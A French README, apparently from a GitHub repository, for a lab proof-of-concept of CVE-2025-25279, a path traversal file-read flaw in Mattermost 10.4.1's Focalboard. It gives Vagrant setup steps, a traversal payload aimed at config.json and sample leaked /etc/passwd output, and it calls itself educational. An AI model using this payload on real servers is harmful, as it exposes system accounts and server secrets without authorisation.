
Exploit de preuve de concept pour CVE-2025-25279, une vulnérabilité de traversée de chemin dans le module Focalboard de Mattermost 10.4.1, permettant l'exfiltration de fichiers arbitraires authentifiée via des pièces jointes conçues.
Cette preuve de concept démontre l’exploitation de la vulnérabilité CVE-2025-25279 affectant Mattermost 10.4.1.
Une faille dans Focalboard (le module de gestion de tableaux) permet une lecture arbitraire de fichiers via un path traversal dans les attachments.
L’exploit permet d’exfiltrer :
/etc/passwd/etc/groupopt/mattermost/config/config.jsonL’attaque fonctionne uniquement avec un compte utilisateur authentifié dans les scénarios vulnérables.
Le dossier target/ n'est pas inclus (trop volumineux pour GitHub).
Télécharger manuellement : https://releases.mattermost.com/10.4.1/mattermost-10.4.1-linux-amd64.tar.gz
D'abord allez dans le repertoire target et faire:
cd target
make mattermost.box
Assurez vous d'avoir la box mattermost-poc sinon la VM ne marche pas:
cd cve-2025-25279-mattermost
vagrant box add mattermost-poc target/mattermost.box
cd live/vm1
vagrant up
Se connecter à la VM
vagrant ssh
ouvrir: http://localhost:8065
Profil --> Security --> Personal Access Tokens
Depuis la machine hôte :
cd live/share
sudo apt-get update -y
sudo apt-get install -y unzip
chmod +x exploit.sh
./exploit.sh
On vous demandera :
PAT (Personal Access Token) :
👉 Entrez un PAT valide d’un utilisateur Mattermost.
📸 Exemple de sortie (exfiltration de /etc/passwd)
===== CONTENU (début) =====
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
mattermost:x:999:996::/opt/mattermost:/bin/sh
Fichier ciblé : config.json
Pour viser un fichier Mattermost sensible :
Modifier en haut du script exploit.sh :
TARGET_SUFFIX="opt/mattermost/config/config.json"
TRAVERSAL_PATH='../../../../../../../opt/mattermost/config/config.json'
L’exploit affichera alors le contenu du fichier config.json.
🟢 MAHAMMAD MOUSSE Abokor 🔵 PARNET cyril
🎬 Démonstration vidéo
👉 Une démonstration complète en vidéo se trouve dans : live/Démonstration/video-poc-cve-2025-25279.mp4
🧩 Notes
Ce PoC est strictement destiné aux environnements d'apprentissage. Ne jamais utiliser hors cadre pédagogique ou sans autorisation.